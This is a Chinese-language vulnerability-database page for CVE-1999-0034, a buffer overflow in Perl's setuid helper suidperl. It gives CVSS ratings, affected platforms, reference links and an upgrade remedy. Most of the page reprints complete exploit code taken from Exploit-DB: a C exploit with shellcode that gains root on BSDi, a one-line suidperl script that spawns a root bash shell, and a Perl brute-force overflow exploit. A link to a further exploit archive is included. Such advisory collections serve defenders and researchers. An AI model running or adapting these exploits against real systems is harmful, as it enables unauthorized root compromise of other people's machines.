CVE-1999-0034
CVSS7.2
发布时间 :1997-05-29 00:00:00
修订时间 :2008-09-09 08:33:36
NMCOE    

[原文]Buffer overflow in suidperl (sperl), Perl 4.x and 5.x.


[CNNVD]suidperl (sperl), Perl缓冲区溢出漏洞(CNNVD-199705-025)

        suidperl (sperl), Perl 4.x和5.x版本存在缓冲区溢出漏洞。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:larry_wall:perl:5.3
cpe:/o:redhat:linux:4.2Red Hat Linux 4.2
cpe:/o:redhat:linux:4.1Red Hat Linux 4.1
cpe:/o:bsdi:bsd_os:3.0
cpe:/a:sgi:freeware:1.0
cpe:/a:sgi:freeware:2.0
cpe:/o:bsdi:bsd_os:2.1
cpe:/o:redhat:linux:4.0Red Hat Linux 4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0034
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0034
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199705-025
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

suidperl (sperl), Perl缓冲区溢出漏洞
高危 缓冲区溢出
1997-05-29 00:00:00 2006-11-16 00:00:00
本地  
        suidperl (sperl), Perl 4.x和5.x版本存在缓冲区溢出漏洞。

- 公告与补丁

        

- 漏洞信息 (200)

BSDi suidperl Local Stack Buffer Overflow Exploit (EDBID:200)
bsd local
2000-11-21 Verified
0 vade79
N/A [点击下载]
/* (BSDi)suidperl[] buffer overflow, by v9[v9@fakehalo.org].  this is that old
   buffer overflow in suidperl, but i never saw any version of it for BSDi.
   so, here it is.  this gives euid=0. (BSDi/3.0)
*/
#define PATH "/usr/bin/suidperl"	/* path to suidperl on BSDi/3.0. */
#define DEFAULT_OFFSET -5000		/* general offset, a lot of room. */
static char exec[]=
 "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
 "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
 "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
 "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
long pointer(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char eip[2048],buf[4096];
 int i,offset;
 long ret;
 printf("[ (BSDi)suidperl[]: buffer overflow, by: v9[v9@fakehalo.org]. ]\n");
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(pointer()-offset);
 eip[0]=0x01;
 for(i=1;i<2048;i+=4){*(long *)&eip[i]=ret;}
 eip[1248]=0x0;
 for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
 memcpy(buf+i,exec,strlen(exec));
 memcpy(buf,"EXEC=",5);putenv(buf);
 printf("*** [data]: return address: 0x%lx, offset: %d.\n",ret,offset);
 if(execlp(PATH,"suidperl",eip,0)){
  printf("*** [error]: could not execute %s successfully.\n",PATH);
  exit(1);
 }
}


// milw0rm.com [2000-11-21]
		

- 漏洞信息 (320)

suid_perl 5.001 vulnerability (EDBID:320)
linux local
1996-06-01 Verified
0 Jon Lewis
N/A [点击下载]
#!/usr/bin/suidperl -U
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");


# milw0rm.com [1996-06-01]
		

- 漏洞信息 (19546)

BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(1) (EDBID:19546)
multiple local
1997-04-17 Verified
0 Pavel Kankovsky
N/A [点击下载]
source: http://www.securityfocus.com/bid/708/info

Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. 

 #!/usr/bin/perl

 # yes, this suidperl exploit is in perl, isn't it wonderful? :)

 $| = 1;

 $shellcode =
 "\x90" x 512 . # nops
 "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp
 # "standard shellcode" by Aleph One
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 # start and end of .data
 # adjust this using /proc/*/maps

 $databot = 0x080a2000;
 $datatop = 0x080ab000;

 # trial and error loop

 $address = $databot + 4;

 while ($address < $datatop) {
 $smash_me =
 $shellcode . ('A' x (2052 - length($shellcode))) .
 (pack("l", $address) x 1000) . ('B' x 1000);
 $pid = fork();
 if (!$pid) {
 exec('/usr/bin/sperl5.003', $smash_me);
 }
 else {
 wait;
 if ($? == 0) {
 printf("THE MAGIC ADDRESS WAS %08x\n", $address);
 exit;
 }
 }
 $address += 128;
 }
		

- 漏洞信息 (19547)

BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(2) (EDBID:19547)
multiple local
1997-04-17 Verified
0 Willy Tarreau
N/A [点击下载]
source: http://www.securityfocus.com/bid/708/info
 
Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. 

http://www.exploit-db.com/sploits/19547.tgz		

- 漏洞信息

10870
Perl suidperl Unspecified Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

1997-05-01 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 5.004 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站